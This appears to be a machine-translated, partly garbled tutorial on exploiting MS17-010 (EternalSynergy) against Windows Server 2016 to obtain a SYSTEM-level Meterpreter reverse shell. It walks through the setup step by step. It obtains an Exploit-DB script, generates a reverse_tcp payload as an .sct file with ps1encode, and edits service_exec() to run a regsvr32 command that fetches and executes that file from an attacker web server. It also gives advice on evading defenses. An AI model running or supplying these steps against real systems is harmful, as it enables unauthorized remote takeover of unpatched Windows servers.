How to get Meterpreter bounce by attacking Eternalblue on windows2016: by backlion0x00 Preface
When Microsoft released the patch for the ms17-010 vulnerability, the vulnerability was affected from Windows 7 to the Windows Server 2016 system version. However, the shadowbrokers released by the eternal Blue attack is very unstable and may affect Windows Server 2012 and later operating system versions, causing 99% of the machines to be attacked by Eternal blue. To understand and be better used, the NSA has released vulnerabilities that have been studied by many security researchers. That's why, a few days ago, a bug (developed by Sleepya) of the Eternal Stone synergy was released. and improved vulnerability exploits, making it more stable when attacking Windows Server 2012 and 2016 systems. But the truth is, if you want to use this vulnerability, you need to figure out whether it's true that when we influence the target machine, we know how it works, and we need to modify some code to get the goal we want.
That's why, after parsing the vulnerability, I'm going to post another article on how to attack windows2016. Step-by-step, the author will explain all the exploit issues, making the Sleepya release of the eternal blue loophole available for normal use and how to modify its features to get a meterpreter bounce shell on the target machine.
0x01 Exploit Exploits
Experiment setting up the environment:
To build the experimental environment, we need to configure the following hosts:
Target host-----Windows Server 2016 (will use a Windows Server 2016 64-bit machine as the target host)
After you install the new operating system, you do not have to make any changes to it. Knowing the destination IP address is sufficient, and the host needs to be operational at the time of the attack.
Attack-----Gnu/linux
Can use any other Linux operating system here the author recommends using Kali, as long as the following tools are installed:
- Python v2.7-https://www.python.org/download/releases/2.7
- Ps1encode-https://github.com/crowecybersecurity/ps1encode
- Metasploit Framework-https://github.com/rapid7/metasploit-framework
Summarize the configuration required to build the lab environment:
- Windows Server x64–ip:10.0.2.13? Target host
- Gnu/linux Debian x64–ip:10.0.2.6? Attack host
Get exploit:
Exploit has been published on EXPLOIT-DB and can be downloaded from:
https://www.exploit-db.com/exploits/42315/
We can see that the exp was written in Python. Therefore, we will save the. py extension on the attacking host. Then run the PY and the error message will appear in the command:
The above error hints can be seen as missing MYSMB modules.
To resolve dependencies:
The code line 3 prompts you to import the "MYSMB" module, but the module is not in the Python public library. We can use Pip to install it, this module was developed by Sleepya and we have to download it from his GitHub, which is:
https://github.com/worawit/MS17-010/blob/master/mysmb.py
We will save a script named "mysmb.py" in the same folder as exploit.py. Keep in mind that in Python, running exploit.py also requires the creation of a file named "__init__.py", which can be found in the folder.
By doing this, the exploit script will find the necessary import modules and there will be no more error prompts.
Check if exploit use is in effect:
If we execute it, once the exploit succeeds, a file named "Pwned.txt" is created on the C: disk on the target host. You can then verify that the exploit is working properly without having to make too many modifications.
Although this simple test does not need to modify any of the vulnerabilities themselves, we have to set some parameters that we will see below.
Identity authentication:
Eternal Stone Synergy exploit premise requires an authenticated attack, and if an attack is initiated, it can be authenticated by Guest account, otherwise we must obtain the user name and password from any other account on the target machine.
It is important to emphasize that the permissions on the account are not important, even if the guest account, the permissions we get after the attack remain system.
To define this information, we must use a text editor to open the exploit.py and jump to the 26th and 27 lines for modification:
You can set the user name and password for authentication in
Parameter settings:
This exploit needs to define two parameters: Destination IP address and pipe name. The SMB protocol defines three types of shares:
File: Files (or disks) shared, representing the directory tree and the files it contains
Print: Printing shares, access to print resources on the server
Pipe: Communication between processes using the FIFO model, which is called a pipe connection, while the system remains running, although the process is no longer active.
Unlike the eternal Blue, eternalromance and Eternalsynergy exploit a bug that accesses named pipes, which is why we need to define which one is used for the attacked host. Personally, you can use "SPOOLSS" or another "browser" to access the pipeline. You can also use the Metasploit Scan module: Auxiliary/scanner/smb/pipe_auditor to find the accessible pipes within the target host.
Perform no shellcode:
Now, we continue to execute the vulnerability with the following command:
Python exploit.py <target_ip> Spoolss
As we said earlier, if the execution succeeds, we will see a new filename "PWNED." TXT "has been created on the C: Disk of the target host machine.
The more than half has been successfully executed. Next, we will continue to analyze how a little modification has been made to the meterpreter bounce shell.
Modify Shellcode:
There are many ways to take advantage of exploit execution to get a meterpreter bounce shell or other method instead of just writing to a text file on the target host.
The first step is to generate the shellcode that we will use, and for this reason the author will use a method that is personally preferred and has many advantages in avoiding security defenses.
To sum up, Shellcode will be born into a. SCT file, the exploit will be downloaded and executed on the target host, thus making us the meterpreter' bounce shell session we need.
Create an. sct file using Ps1encode:
Ps1encode is a useful tool to allow us to generate and encode Metasploit payloads in various formats of PowerShell.
We can download it from GitHub:
Https://github.com/CroweCybersecurity/ps1encode.
To generate the required payload, we will run the tool with the following parameters:
Ruby ps1encode.rb--payload windows/meterpreter/reverse_tcp--lhost=<attacker_ip>-lport=4444-t SCT
We are generating. The SCT file must be stored in the attacker's host or on a Web server in any other host. That's why when you execute the last command, the tool asks us what the full URL of the. sct file is. If we are going to use an attack host, we only need:/HTTP <ATTACKER_IP>.
Note: You can move the produced. sct file to/var/www/html/and start the Web service so that its web can access
Allow SHELLCODE.SCT to download:
The final step is to generate a INDEX.SCT file in the Ps1encode folder, in order for the exploited SCT file to be downloaded to the target host, we must move it to the Web server folder and set the required permissions.
Edit exploit.py:
If we open exploit.py with a text editor and we move to line 463 and above, we will find the following:
Here we can see a pwned.txt file with a exploit attack and create a file on the target host, but more interestingly, in the following line, you can find a annotated service_exec () function in it. As you can see, the function creates a pwned.txt copy file with the copy command as an example. If we do not delete the # symbol before the line, the command is not executed. If you delete the # symbol and run the exploit again, we'll see in the directory host that there are two text files on the C: Disk: Pwned.txt and Pwned_exec.txt.
It can be clearly seen that we can modify any of the other commands we want to execute.
Execution Shellcode:
Now we know that we have to modify this exploit to change its final execution result, to download the service_exec () command of the edit call function to the target host and execute the Meterprete bounce shell.
regsvr32/s/n/u/I:HTTP://<ATTACKER_WEBSERVER_IP>/SHELLCODE.SCT ScrObj.dll
The use of this exploit will be as follows:
Get Meterpreter session:
Finally, before executing exploit.py execution, we must configure the Metasploit Exploit/multi/handle to receive the Meterpreter session.
We use Expliot to execute the script that was saved for the last modification of exploit.py.
After a few seconds, we will get the Meterpreter bounce shell session on the target computer, which has system permissions.
0x02 Summary
Finally, we got the Meterpreter shell with administrator privileges on Windows Server 2016. A few weeks ago, the author published the exploit article in the Exploit-db community, but only wrote about Windows 7 and Windows Server R2 and Windows Server R2 exploits. This time will be published on the exploitation of windows2016.
How to get meterpreter bounce by attacking Eternalblue on windows2016